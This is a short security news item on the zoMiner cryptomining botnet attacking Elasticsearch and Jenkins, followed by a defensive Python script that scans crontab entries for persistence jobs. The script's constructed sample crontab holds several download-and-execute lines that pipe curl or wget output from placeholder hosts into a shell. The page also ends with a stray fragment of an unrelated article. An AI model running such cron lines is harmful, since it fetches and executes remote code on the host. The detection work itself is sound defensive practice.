After being discovered in November 2020, the zoMiner botnet has shifted direction to target vulnerable versions of Elasticsearch and Jenkins servers. According to Qihoo 360’s Network Security Research Lab, the botnet scans for unpatched Elasticsearch and Jenkins instances and attempts to exploit CVE-2015-1427 against Elasticsearch, along with a Jenkins vulnerability whose CVE the report does not name. The exploit attempts to download and execute a shell script that is served as a .txt file. Once the script is running, zoMiner terminates any competing miners on the host, sets up persistence via cron, and starts its own miner. To date, zoMiner has amassed over $4,500 USD worth of cryptocurrency.
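The two host-level behaviours described above (a shell script fetched under a .txt extension and persistence through cron) are exactly what a defender can look for on a suspected host. The following is an added example, not code from the report or from Qihoo 360, that scans a crontab dump for jobs which pull remote content and pipe it straight into a shell, and separately flags jobs whose fetched URL ends in .txt. The crontab lines and the addresses in them (203.0.113.10, example.invalid) are constructed for the example and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab (not taken from the page or the campaign).
# Line 3, 4 and 6 are the kind of entries a download-and-execute persistence
# mechanism leaves behind; lines 2 and 5 are benign administrative jobs.
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/10 * * * * curl -fsSL http://203.0.113.10/x.txt | sh
@reboot wget -q -O - http://example.invalid/start.txt | bash
30 2 * * 0 /usr/local/bin/backup.sh
*/5 * * * * (curl -s http://203.0.113.10/a.txt || wget -qO- http://203.0.113.10/a.txt) | sh >/dev/null 2>&1
"""

DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")
# Stop a URL at whitespace, quotes, parentheses or a pipe so "(curl ... url)" parses cleanly.
URL_RE = re.compile(r"https?://[^\s'\"()|]+")
# A single pipe into sh/bash/dash (optionally /bin/-prefixed); "||" does not match.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba|da)?sh\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    urls: list
    reasons: list


def split_entry(line):
    """Return (schedule, command) for a crontab job line, or None for
    comments, blank lines, environment assignments and malformed entries."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):            # @reboot, @hourly, ...
        parts = stripped.split(None, 1)
        if len(parts) != 2:
            return None
        return parts[0], parts[1]
    parts = stripped.split(None, 5)         # five schedule fields + command
    if len(parts) != 6:
        return None
    return " ".join(parts[:5]), parts[5]


def scan_crontab(text):
    """Scan crontab text and return a Finding for every job that fetches
    remote content and hands it to a shell, or that fetches a .txt URL
    and pipes it into a shell (script disguised as a text file)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        urls = URL_RE.findall(command)
        piped_to_shell = PIPE_TO_SHELL_RE.search(command) is not None
        reasons = []
        if DOWNLOADER_RE.search(command) and urls and piped_to_shell:
            reasons.append("remote content piped into a shell")
        if piped_to_shell and any(u.lower().endswith(".txt") for u in urls):
            reasons.append("script fetched under a .txt extension")
        if reasons:
            findings.append(Finding(line_no, schedule, command, urls, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRON):
        print(f"line {f.line_no} [{f.schedule}] {', '.join(f.reasons)}")
        for url in f.urls:
            print(f"    fetches {url}")
```

Run it against `crontab -l` output for each user and the files under `/etc/cron.d` on a suspect host; a hit is a starting point for triage (check the fetched URL, the process tree and any miner processes), not proof of compromise, since some legitimate installers also use the pipe-to-shell pattern.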
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in